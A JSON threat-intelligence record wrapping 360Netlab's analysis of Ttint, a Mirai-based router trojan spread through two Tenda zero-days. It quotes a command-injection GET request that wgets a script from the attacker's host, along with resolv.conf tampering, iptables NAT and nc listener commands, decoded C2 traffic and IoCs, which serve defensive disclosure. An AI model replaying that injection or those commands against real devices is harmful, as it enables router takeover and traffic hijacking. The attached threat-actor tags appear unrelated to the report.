{
	"id": "396074f5-ac8a-4220-b656-da6f4bbf0f02",
	"created_at": "2026-04-06T00:07:09.109187Z",
	"updated_at": "2026-04-10T03:31:18.908285Z",
	"deleted_at": null,
	"sha1_hash": "67df0bb004e8920cf60690a2e992597b85aabb69",
	"title": "Ttint: An IoT Remote Access Trojan spread through 2 0-day vulnerabilities",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 786680,
	"plain_text": "Ttint: An IoT Remote Access Trojan spread through 2 0-day vulnerabilities\r\nBy Alex.Turing\r\nPublished: 2020-10-01 · Archived: 2026-04-05 13:33:02 UTC\r\nAuthor: Lingming Tu, Yanlong Ma, Genshen Ye\r\nBackground introduction\r\nStarting from November 2019, the 360Netlab Anglerfish system has successively observed an attacker using two Tenda router 0-day vulnerabilities to spread a Remote Access Trojan (RAT) based on Mirai code.\r\nConventional Mirai variants normally focus on DDoS, but this variant is different. In addition to DDoS attacks, it implements 12 remote access functions for router devices, such as a Socks5 proxy, tampering with the router DNS, setting iptables rules, and executing custom system commands.\r\nIn addition, at the C2 communication level it uses the WSS (WebSocket over TLS) protocol. This circumvents the typical Mirai traffic detection at the network level, and it also provides encrypted communication with the C2.\r\nAs for the infrastructure, the attacker first used a Google Cloud service IP, and then switched to a hosting provider in Hong Kong. When we looked up the website certificate, sample, domain name and IP in our DNSmon system, we were able to see more infrastructure IPs, samples, and C2 domain names.\r\nTwo zero-days, 12 remote access functions for the router, an encrypted traffic protocol, and infrastructure IPs that move around: this botnet does not seem to be a very typical player.\r\nWe named this botnet Ttint.\r\n0-day vulnerability attack\r\nOn November 9, 2019, we detected that the attacker used the first Tenda router 0-day vulnerability (CVE-2018-14558 \u0026 CVE-2020-10987) to spread Ttint samples. It is worth noting that this vulnerability was not disclosed until July 10, 2020[1].\r\nGET /goform/setUsbUnload/.js?deviceName=A;cd%20/tmp%3Brm%20get.sh%3Bwget%20http%3A//34.92.139.186%3A5001/bot/ge\r\nHost: {target}\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.22.0\r\nhttps://blog.netlab.360.com/ttint-an-iot-remote-control-trojan-spread-through-2-0-day-vulnerabilities/\r\nPage 1 of 11\r\nOn August 21, 2020, we saw the second Tenda router 0-day vulnerability being used to spread Ttint samples.\r\nOn August 28, 2020, we reported the details of the second 0-day vulnerability and the PoC to the router manufacturer Tenda via email, but the manufacturer has not yet responded.\r\n0-day vulnerability scope\r\nUsing the 360 FirmwareTotal system, we found that the following Tenda router firmwares are affected.\r\nUS_AC9V1.0BR_V15.03.05.14_multi_TD01\r\nUS_AC9V1.0BR_V15.03.05.16_multi_TRU01\r\nUS_AC9V1.0BR_V15.03.2.10_multi_TD01\r\nUS_AC9V1.0BR_V15.03.2.13_multi_TD01\r\nUS_AC9V1.0BR_V15.03.2.13_multi_TDE01\r\nUS_AC9V3.0RTL_V15.03.06.42_multi_TD01\r\nUS_AC10UV1.0RTL_V15.03.06.48_multi_TDE01\r\nUS_AC15V1.0BR_V15.03.05.18_multi_TD01\r\nUS_AC15V1.0BR_V15.03.05.19_multi_TD01\r\nUS_AC15V1.0BR_V15.03.1.8_EN_TDEUS\r\nUS_AC15V1.0BR_V15.03.1.10_EN_TDC+TDEUS\r\nUS_AC15V1.0BR_V15.03.1.10_EN_TDCTDEUS\r\nUS_AC15V1.0BR_V15.03.1.12_multi_TD01\r\nUS_AC15V1.0BR_V15.03.1.16_multi_TD01\r\nUS_AC15V1.0BR_V15.03.1.17_multi_TD01\r\nUS_AC18V1.0BR_V15.03.05.05_multi_TD01\r\nUS_AC18V1.0BR_V15.03.3.6_multi_TD01\r\nUS_AC18V1.0BR_V15.03.3.10_multi_TD01\r\nac9_kf_V15.03.05.19(6318_)_cn\r\nac18_kf_V15.03.05.19(6318_)_cn\r\nWe also looked it up in the 360 Quake cyberspace surveying and mapping system; the following is the result.\r\nTtint overview\r\nTtint is a remote access Trojan for router devices based on Mirai code. In addition to reusing 10 Mirai DDoS attack instructions, it also implements 12 control instructions.\r\nWe analyzed and compared Ttint samples from the two periods and found that their C2 instructions were exactly the same, but they differed in the 0-day vulnerability, XOR key, and C2 protocol used.\r\nReverse analysis\r\nGenerally speaking, at the host level, Ttint's behavior is relatively simple. When running, it deletes its own file, manipulates the watchdog to prevent the device from restarting, and runs as a single instance by binding a port; it then modifies its process name to confuse the user; finally, it establishes a connection with the decrypted C2, reports device information, waits for the C2 to issue instructions, and executes the corresponding attacks or custom functions.\r\nWe can see that it retains a large number of Mirai features, such as the single instance, random process name, encryption of sensitive configuration information, integration of a large number of attack vectors, etc. There are changes though; most notably, it rewrites the network communication part to use the WebSocket protocol.\r\nLet's take a look at some of the custom functions.\r\nTtint v2 sample analysis\r\nMD5: 73ffd45ab46415b41831faee138f306e\r\nELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped\r\nLib: uclib\r\nSocks5 proxy\r\nBy binding the specific port issued by the C2, the bot enables a Socks5 proxy service. The attacker can then remotely access the router's intranet and roam the internal network.\r\nTampering with router DNS\r\nIt tampers with the router DNS by modifying the resolv.conf file:\r\necho nameserver \"DNS server\" \u003e /etc/etc/resolv.conf\r\nThe result is that the author of Ttint can hijack any network access of users behind the affected routing device, possibly to monitor or steal sensitive information.\r\nConfig iptables\r\nBy setting up iptables, traffic forwarding and destination address translation can be easily achieved. The following config exposes internal network services to the public network.\r\niptables -t nat -A PREROUTING -d \"\" -p tcp --dport \"\" -j DNAT --to-destination \"\"\r\niptables -t nat -A POSTROUTING -d \"\" -p tcp --dport \"\" -j SNAT \"\"\r\niptables -A FORWARD -d -j ACCEPT\r\nReverse shell\r\nBy implementing a reverse shell through a socket, the author of Ttint can operate the shell of the affected routing device as if it were a local shell.\r\nSelf-upgrade\r\nThe bot can download the binary for the corresponding CPU architecture from the specified Download URL (default is uhyg8v.notepod2.com:5001) to update itself.\r\nSelf-exit\r\nTtint implements a single instance by binding port 57322; by killing the process using this port, it can exit itself.\r\nHidden network channel\r\nBy using the nc tool to listen on a specific port issued by the C2, communication between the Ttint author and the affected routing device can be established. (The meaning of the -d parameter is \"Detach from stdin\", so we speculate that there is a redirection instruction after PORT.)\r\nnc -d -l \"PORT\" \"some redirect cmd\"\r\nReport device information\r\nIt reports the time, os, cpu, ip, version, and mac information of the device to the C2, but there is a bug in the format string in the sample: an \"\u0026\" character is missing in type=back_infoatk_id=%s\u0026time=\u0026os=\r\nExecute system commands\r\nIt executes custom system commands issued by the C2 through the popen function.\r\nC2 protocol analysis\r\nThe C2 information of the Ttint bot sample is encrypted and stored in the configuration information table in the Mirai format. The XOR key is 0x0EDFCEBDA\r\nc2 ciphertext:\r\n51 19 55 56 56 45 59 50 49 62 0E 4E 4F 54 45 50 4F 44 12 0E 43 4F 4D 20\r\nc2 plaintext:\r\nq9uvveypiB.notepod2.com\r\nWhen the bot is running, it decrypts the configuration to obtain the C2 address ws:q9uvveypiB.notepod2.com:443, and then communicates with the C2 securely through the WebSocket over TLS protocol.\r\nWebSocket protocol\r\nWhen the Ttint C2 replies to the bot with a response code of 101, the protocol handshake is completed, and the bot can then communicate using the WebSocket protocol. The following is an example of a WebSocket packet after TLS decryption.\r\nBot's “go live” packet\r\nAccording to the WebSocket protocol, we know that the payload length is 0x81, the mask is 0xD5F39E67, and the payload data is at offsets 0x08~0x88.\r\n00000000: 81 FE 00 81 D5 F3 9E 67 A1 8A EE 02 E8 91 FF 04 .......g........\r\n00000010: BE AC F7 09 B3 9C B8 06 A1 98 C1 0E B1 CE AE 41 ...............A\r\n00000020: A1 9A F3 02 E8 D5 F1 14 E8 BF F7 09 A0 8B BE 53 ...............S\r\n00000030: FB C2 AB 49 E5 DE AA 55 F8 94 FB 09 B0 81 F7 04 ...I...U........\r\n00000040: F3 90 EE 12 E8 9A A8 5F E3 D5 F7 17 E8 C2 A7 55 ......._.......U\r\n00000050: FB C2 A8 5F FB C1 AC 55 FB C2 AC 5F F3 85 FB 15 ..._...U..._....\r\n00000060: A6 9A F1 09 E8 C6 FD 02 E5 91 A9 04 E7 D5 FF 15 ................\r\n00000070: B2 80 A3 41 B8 92 FD 5A E5 C3 A4 57 B6 C9 AC 5E ...A...Z...W...^\r\n00000080: EF C4 F8 5D E7 C7 A4 5E E7\r\nXORing the payload data with the mask yields the payload in plain text, which is exactly the bot's “go live” packet.\r\n00000000 74 79 70 65 3d 62 61 63 6b 5f 69 6e 66 6f 26 61 |type=back_info\u0026a|\r\n00000010 74 6b 5f 69 64 3d 30 26 74 69 6d 65 3d 26 6f 73 |tk_id=0\u0026time=\u0026os|\r\n00000020 3d 4c 69 6e 75 78 20 34 2e 31 35 2e 30 2d 34 32 |=Linux 4.15.0-42|\r\n00000030 2d 67 65 6e 65 72 69 63 26 63 70 75 3d 69 36 38 |-generic\u0026cpu=i68|\r\n00000040 36 26 69 70 3d 31 39 32 2e 31 36 38 2e 32 32 32 |6\u0026ip=192.168.222|\r\n00000050 2e 31 32 38 26 76 65 72 73 69 6f 6e 3d 35 63 65 |.128\u0026version=5ce|\r\n00000060 30 62 37 63 32 26 61 72 67 73 3d 26 6d 61 63 3d |0b7c2\u0026args=\u0026mac=|\r\n00000070 30 30 3a 30 63 3a 32 39 3a 37 66 3a 32 34 3a 39 |00:0c:29:7f:24:9|\r\n00000080 32\r\nC2 instruction\r\nAll together, the Ttint bot supports 22 kinds of C2 commands: the 10 DDoS commands are from Mirai, and the remaining 12 are new.\r\nid instruction\r\n0 attack_udp_generic\r\n1 attack_udp_vse\r\n2 attack_udp_dns\r\n9 attack_udp_plain\r\n3 attack_tcp_flag\r\n4 attack_tcp_pack\r\n5 attack_tcp_xmas\r\n6 attack_grep_ip\r\n7 attack_grep_eth\r\n10 attack_app_http\r\n12 run \"nc\" command\r\n13 run \"ls\" command\r\n15 Execute system commands\r\n16 Tampering with router DNS\r\n18 Report device information\r\n14 Config iptables\r\n11 run \"ifconfig\" command\r\n17 Self-exit\r\n19 Open Socks5 proxy\r\n20 Close Socks5 proxy\r\n21 Self-upgrade\r\n22 Reverse shell\r\nC2 command format analysis\r\nWe captured the following commands that the C2 sent to the bots.\r\n00000000: 00 55 00 00 00 0A 0F 01 00 00 00 00 20 02 1A 13 .U.......... ...\r\n00000010: 70 70 2D 6C 4F 76 32 78 39 6E 31 33 58 73 5A 30 pp-lOv2x9n13XsZ0\r\n00000020: 77 76 44 1B 30 69 70 74 61 62 6C 65 73 20 2D 44 wvD.0iptables -D\r\n00000030: 20 49 4E 50 55 54 20 2D 70 20 74 63 70 20 2D 2D INPUT -p tcp --\r\n00000040: 64 70 6F 72 74 20 35 32 36 38 35 20 2D 6A 20 41 dport 52685 -j A\r\n00000050: 43 43 45 50 54 CCEPT\r\nThe following is a breakdown of the format:\r\n00 55 ---- msg length\r\n0F ---- cmd id, here is \"run system cmd\"\r\n02 ---- option number\r\n1A ---- option type, here is \"attack id\"\r\n13 ---- option length, length of \"pp-lOv2x9n13XsZ0wvD\" = 0x13\r\n1B ---- option type, here is \"attack cmd buf\"\r\n30 ---- option length\r\nGenerally speaking, Ttint combines multiple custom functions to achieve a specific attack goal. Take the two adjacent commands we captured: the first command is iptables -I INPUT -p tcp --dport 51599 -j ACCEPT, which allows access to port 51599 of the affected device.\r\n00000000: 82 55 00 55 00 00 00 0A 0F 01 00 00 00 00 20 02 .U.U.......... .\r\n00000010: 1A 13 70 70 2D 51 77 76 73 59 59 45 45 4D 70 36 ..pp-QwvsYYEEMp6\r\n00000020: 77 49 31 62 43 1B 30 69 70 74 61 62 6C 65 73 20 wI1bC.0iptables\r\n00000030: 2D 49 20 49 4E 50 55 54 20 2D 70 20 74 63 70 20 -I INPUT -p tcp\r\n00000040: 2D 2D 64 70 6F 72 74 20 35 31 35 39 39 20 2D 6A --dport 51599 -j\r\n00000050: 20 41 43 43 45 50 54 ACCEPT\r\nThe next command enables the Socks5 proxy function on port 51599 of the affected device.\r\n00000000: 82 3C 00 3C 00 00 00 0A 13 01 00 00 00 00 20 04 .\u003c.\u003c.......... .\r\n00000010: 1C 05 35 31 35 39 39 1D 06 61 6D 68 78 65 66 1E ..51599..amhxef.\r\n00000020: 08 64 40 61 59 79 31 39 52 1A 13 70 70 2D 30 58 .d@aYy19R..pp-0X\r\n00000030: 74 79 73 61 33 79 58 4D 51 59 6E 6C 41 72 tysa3yXMQYnlAr\r\nThe combination of the two commands enabled the proxy and allowed the attacker to use it.\r\nRecommendations\r\nWe recommend that Tenda router users check their firmware and apply the necessary updates.\r\nWe also recommend that our readers monitor and block the related IoCs.\r\nContact us\r\nInterested readers can contact us on twitter or via email netlab[at]360.cn.\r\nIoC\r\nIP:\r\n34.92.85.21 Hong Kong ASN15169 GOOGLE\r\n34.92.139.186 Hong Kong ASN15169 GOOGLE\r\n43.249.29.56 Hong Kong ASN133115 HK Kwaifong Group Limited\r\n45.249.92.60 Hong Kong ASN133115 HK Kwaifong Group Limited\r\n45.249.92.72 Hong Kong ASN133115 HK Kwaifong Group Limited\r\n103.60.220.48 Hong Kong ASN133115 HK Kwaifong Group Limited\r\n103.108.142.92 Hong Kong ASN133115 HK Kwaifong Group Limited\r\n103.243.183.248 Hong Kong ASN133115 HK Kwaifong Group Limited\r\nC2:\r\ncnc.notepod2.com:23231\r\nback.notepod2.com:80\r\nq9uvveypiB.notepod2.com:443\r\nUpdate Server:\r\nuhyg8v.notepod2.com:5001\r\nURL:\r\nhttp://45.112.205.60/td.sh\r\nhttp://45.112.205.60/ttint.i686\r\nhttp://45.112.205.60/ttint.arm5el\r\nhttp://45.112.205.60/ttint.mipsel\r\nhttp://34.92.139.186:5001/bot/get.sh\r\nhttp://34.92.139.186:5001/bot/ttint.mipsel\r\nhttp://34.92.139.186:5001/bot/ttint.x86_64\r\nMD5:\r\n3e6a16bcf7a9e9e0be25ae28551150f5\r\n4ee942a0153ed74eb9a98f7ad321ec97\r\n6bff8b6fd606e795385b84437d1e1e0a\r\n733f71eb6cfca905e8904d0fb785fb43\r\na89cefdf71f2fced35fba8612ad07174\r\nc5cb2b438ba6d809f1f71c776376d293\r\ncfc0f745941ce1ec024cb86b1fd244f3\r\n73ffd45ab46415b41831faee138f306e\r\nSource: https://blog.netlab.360.com/ttint-an-iot-remote-control-trojan-spread-through-2-0-day-vulnerabilities/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://blog.netlab.360.com/ttint-an-iot-remote-control-trojan-spread-through-2-0-day-vulnerabilities/"
	],
	"report_names": [
		"ttint-an-iot-remote-control-trojan-spread-through-2-0-day-vulnerabilities"
	],
	"threat_actors": [
		{
			"id": "67bf0462-41a3-4da5-b876-187e9ef7c375",
			"created_at": "2022-10-25T16:07:23.44832Z",
			"updated_at": "2026-04-10T02:00:04.607111Z",
			"deleted_at": null,
			"main_name": "Careto",
			"aliases": [
				"Careto",
				"The Mask",
				"Ugly Face"
			],
			"source_name": "ETDA:Careto",
			"tools": [
				"Careto"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-10T02:00:03.325163Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f5bf6853-3f6e-452c-a7b7-8f81c9a27476",
			"created_at": "2023-01-06T13:46:38.677391Z",
			"updated_at": "2026-04-10T02:00:03.064818Z",
			"deleted_at": null,
			"main_name": "Careto",
			"aliases": [
				"The Mask",
				"Ugly Face"
			],
			"source_name": "MISPGALAXY:Careto",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434029,
	"ts_updated_at": 1775791878,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/67df0bb004e8920cf60690a2e992597b85aabb69.pdf",
		"text": "https://archive.orkl.eu/67df0bb004e8920cf60690a2e992597b85aabb69.txt",
		"img": "https://archive.orkl.eu/67df0bb004e8920cf60690a2e992597b85aabb69.jpg"
	}
}